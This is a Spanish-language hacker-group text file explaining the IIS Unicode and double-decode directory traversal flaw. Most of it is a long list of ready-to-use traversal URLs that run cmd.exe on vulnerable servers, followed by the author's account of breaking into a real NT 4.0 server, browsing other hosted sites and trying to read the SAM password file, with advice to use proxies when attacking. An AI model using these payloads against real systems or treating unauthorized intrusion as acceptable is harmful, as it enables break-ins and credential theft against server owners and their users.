||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||| Tema: Atacando www 2 |||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||| Por: sa[N]to                      |||
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

--------------------------------------------------------------------------------------------------------------------------------------------------------
Vamos a ver como mierda explico esto para que lo entienda cualquiera (desde mogolicos como yo, hasta los
super elit0 que hay en todos lados
--------------------------------------------------------------------------------------------------------------------------------------------------------

Explicacion:

Supongamos que nosotros queremos el archivo agenda.txt, de la carpeta personales, que es un directorio no
abierto al publico para decir de alguna manera. Como conocemos de la falla del Unicode pondriamos
la siguiente URL: http://www.todio2.com/scripts/..%c1%9c../personales/Agenda.txt. Como siguiente paso, el IIS
evaluaria nuestro pedido y éste llegaría a la conclusión de que el visitante está pidiendo un archivo del directorio 
virtual "/scripts", que se encontraria dentro un subdirectorio llamado ..%c1%9c..
A continuacion de que el IIS evalue el pedido, este interpretaria el códigos Unicode "%c1%9c" (que
representan la barra) y "llegaria" a la conclusionde que el archivo que el  IIS le pidio al NT o derivado sería 
c:/inetpub/wwwroot/scripts/../../personales/autoexec.bat, pero como "scripts" es una carpeta virtual, 
el archivo que el IIS pediria sería c:/inetpub/wwwroot/personales/../../autoexec.bat (inetpub/wwwroot es porque
ahi es donde el NT guarda las paginas generalmente)o sea el archivo al final es C:/Personales/Agenda.txt.

O sea, facil y cortito, lo que hacemos con esto, es escalar directorios y permisos en el Internet Information 
Service (IIS).

El Decode fue descuniero primero, lo que hace es la decodificacion de los simbolos (ej: ..%255c..) y saltear
directorios como el Unicode. Es muy parecido.

Teoria:

En teoria, lo que podemos hacer es tomar control de la maquina y modificar, archivos o carpetas a gusto, hacer
lo que se nos re cante (si )


Explotandolo:

Bue, no es muy dificil, si por ejemplo tomamos como parametro el ejemplo anterior, con solo poner por ejemplo
http://www.todio.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: podriamos ver todo el contenido del 
disco c (poniendo dir+e, +f, etc. podriamos ir viendo todos los dicos que esta maquina tuviera). Las variaciones 
de este bug son muchas, asi que si con /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: no conseguimos
explotar la falla podemos provar con estas variaciones del Unicode y Del Decode (es una lista muyyyyyy larga):

DECODE:

/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

UNICODE
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir +c:\
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+*.a
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+";
/scripts..%c1%9c../winnt/system32/cmd.exe?/c+";
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+";
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+";
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+";
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+";
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+";
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+";
/scripts/..%c1%af../winnt/system32/cmd.exe?/c+";
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+";
/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+";
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+";
/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+";
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";

[Lista sacada del HT, Gracias Cyrano] 

Ejemplo real:

Un miembro del Mz descubrio una falla en un serdidor NT 4.0
Lo que los miembros del team hicimos fue revisar como era que estaba dispuesta la seguridad del server ese
y le avisamos al webmaster. Esto fue como hace un mes
Como en el team no queriamos "romper" nada porque no somos crackers, dejamos el disco y la pagina como 
estaba pero hoy, 15 de Agosto, yo revise si ya el admin nos habia echo caso y comprobe nuestra sospecha, es
un verdadero lamm0. Paso a explicar como fue que yo hice lo mio:

Despues de que Dj_Droga me dijo que habia encontrado la falla, yo volvi a escannear el sitio para ver si encontraba
alguna falla mas. Lo que encontre fue la falla del Unicode, y algunas cosas boludas, que no me daban mas beneficios.

Como con cualquier navegador se puede joder con este bug, agarre el Netscape en su sabor windoze, y me puse a boludear y ver que tenia, los script asp, etc. (estaba muy al pedo). Revise los discos y si mal no me acuerdo, en el disco e:

Como dije antes, las paginas se almacenan en inetpub\wwwroot, fui hasta ese directorio poniendo lo siguiente:
http://servidor.com/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+e:\inetpub\wwwroot\web
Ahi descubri las presentaciones en Ingles y Español, el Index, y otras boludeces de la pagina. Como segui muy 
al pedo segui revisando, y en e:\inetpub\wwwroot habia cosas de otras webs alojadas. Segui boludeando un poco mas y encontre el sam del sistema (el de repair es, ya que el original no se puede usar porque esta siempre siendo usado por el sistema). Lo trate de ver, pero el admin en eso se habia fijado y le saco hasta el permiso de lectura =(

Despedida

Bue, eso es todo, no se que mas poner, la verdad que no se me ocurre nada, me parece que revise todas las
partes del Unicode/Decode. Lo unico que les digo, es que no borren todas las paginas que encuentren por ahi
con este bug, avisenle a los admins, queden bien y no hagan boludeces, si las van a hecr usen proxys (parece
una propaganda de forros =P). Cualquier duda mandenme un mail a la_garza_86@hotmail.com y yo veo como
respondo.

Saludos

sa[N]to

Miembro del MerzenarioZ Team

|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
||| Estoy empesando un programa para boludear con esto del Unicode/Decode, cuando lo termine, lo voy a hacer |||
||| publico, mientras va a estar en el mz perfeccionandose        					|||
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
